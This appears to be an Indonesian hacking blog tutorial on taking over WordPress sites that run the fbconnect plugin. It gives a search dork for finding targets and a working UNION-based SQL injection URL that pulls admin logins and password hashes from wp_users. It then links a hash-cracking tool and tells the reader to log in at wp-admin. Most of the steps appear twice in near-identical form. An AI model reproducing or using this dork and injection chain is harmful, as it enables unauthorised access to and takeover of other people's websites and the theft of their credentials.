![[Image: wordpress-hack.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTw6GjvjNEfaonF5-RIXmg01_rId6AXh6h_t-GJKoLqunrZEKEW1RV8oZ6vqPkUBiXdTSCSsl-d66W1wn7i1HrESqJCkDpY3UoGZaz5ffCOZnCOiOMg3AjRO0b6pFjXqc_-VhIB3VTmKTQ/s400/wordpress-hack.jpg)
Dork: inurl:"fbconnect_action=myhome"
Exploit: ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
![[Image: untitled24.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjkGD4ZeB-YmopHJYwcbJSOIKXhiBImfFDSAEjktBGia1ThbJy1l-qnJbYcTZfAccHyXGsv1_9LgF0gPdkkTDIkkPT6Q5LAfTRmaV8S3A5LogYanMx2EyFLxTxE6Ev5PoMJgC6O2LyY90n/s400/untitled24.JPG)
Klik situs Targetnya
![[Image: untitled22.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcHnMnEK_SHFln2nV_dGR6iHqwiCy74aX-Il8ej1W8ohQjeWyIqMoNnR76Luhdv4IWI_Ogv1V-VyJCChX_jErwwSsbGfXimh5TI_K7lA4lzAUG4HYGBeyyUbUzH7AlUhU4QzvUDgT-E8fW/s400/untitled22.JPG)
Sekarang ubah URL :
?fbconnect_action=myhome&userid=
Dengan EXPLOIT ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
![[Image: untitled23.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKvkTmScPZB32ZsQWbDPs5dJQoNXkAAWMZJ7ElT7u1ktaI1ODnlQ7DM2HuA_4hcH-c8PnxXW54p9OuQRkkHpChyphenhyphenr9Ij3oPPD60J0kgpNM1pIzgSyygF6KO1MxrH5xWnWUEV9UoBQs-qjI8/s400/untitled23.JPG)
Sekarang keluar Username dan Password Admin.
Encrypt Password MD5 (Blowfish) dengan software yang ada di sini
http://www.easy-share.com/1917245768/passwordspro.zip
Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
Klik situs Targetnya
Sekarang ubah URL :
?fbconnect_action=myhome&userid=
Dengan EXPLOIT ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Sekarang keluar Username dan Password Admin.
Encrypt Password MD5 (Blowfish) dengan software yang ada di sini
http://www.easy-share.com/1917245768/passwordspro.zip
Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
TararararaTara Masuk Deh :D